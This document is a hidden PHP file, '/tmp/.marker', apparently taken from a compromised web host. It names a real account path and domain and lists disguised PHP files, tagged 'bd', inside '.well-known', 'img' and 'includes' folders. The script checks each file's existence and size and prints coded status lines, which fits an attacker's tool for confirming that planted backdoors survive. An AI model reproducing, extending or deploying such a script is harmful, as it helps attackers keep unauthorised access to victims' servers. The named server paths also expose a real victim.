File: //tmp/.marker
<?php $r = '/home/vitanhod/trimate.vitavit.com.pk'; $x = ["/includes/configOnline.php"=>"bd@@1335485@@86",
"/.well-known/editfees.php"=>"bd@@1334773@@61",
"/orderemail.php"=>"bd@@1335546@@25",
"/img/Pager.php"=>"bd@@1315110@@64",
"/.well-known/pki-validation/gallery.lang_es.php"=>"bd@@1335564@@3",
"/File.class.php"=>"bd@@1335528@@59",
"/img/rindex.php"=>"bd@@1335583@@924",
"/.well-known/T.php"=>"bd@@1335590@@976",
"/includes/action.newdir.php"=>"bd@@1310566@@934",
"/.well-known/pki-validation/gallery.lang_es.php"=>"bd@@1309801@@825",
"/File.class.php"=>"bd@@1310630@@1051"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');